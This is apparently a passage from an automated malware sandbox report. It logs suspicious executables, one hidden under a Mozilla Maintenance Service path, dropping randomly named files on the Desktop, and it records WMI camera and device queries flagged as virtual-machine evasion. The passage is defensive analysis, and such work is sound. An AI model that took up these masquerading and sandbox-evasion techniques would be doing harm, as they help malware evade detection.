                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\hgVgFZAw.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\MjOKfqVp.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\EySSXLrj.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\EgPkCslz.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\fFJfpvVh.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\PZEBmnVi.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\tAUMwPQX.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\rMQELCVZ.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\kWLWNWBq.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\DKOKmxvl.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\BvjTveaH.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\WSdqVQmD.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\YQFyrQBy.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\NcaIHEGQ.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\EySSXLrj.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\mmqNDpWU.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\VeZikCqF.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\CNmCQxgq.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\rZIMgllI.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\aSrhMzGt.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\HAEBtuve.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\qtoWZHQP.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\fFJfpvVh.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\VWqPFTQA.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\DKOKmxvl.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\sDsEbPBc.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\DjncgsWF.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\tAUMwPQX.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\kWLWNWBq.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\RFZqtRqa.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\AyILZeLM.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\hgVgFZAw.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\PZEBmnVi.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\EgPkCslz.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\dqepydAD.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\MjOKfqVp.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\BvjTveaH.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\rMQELCVZ.logJump to dropped file
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile created: C:\Users\user\Desktop\ZzoyrgAK.logJump to dropped file
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
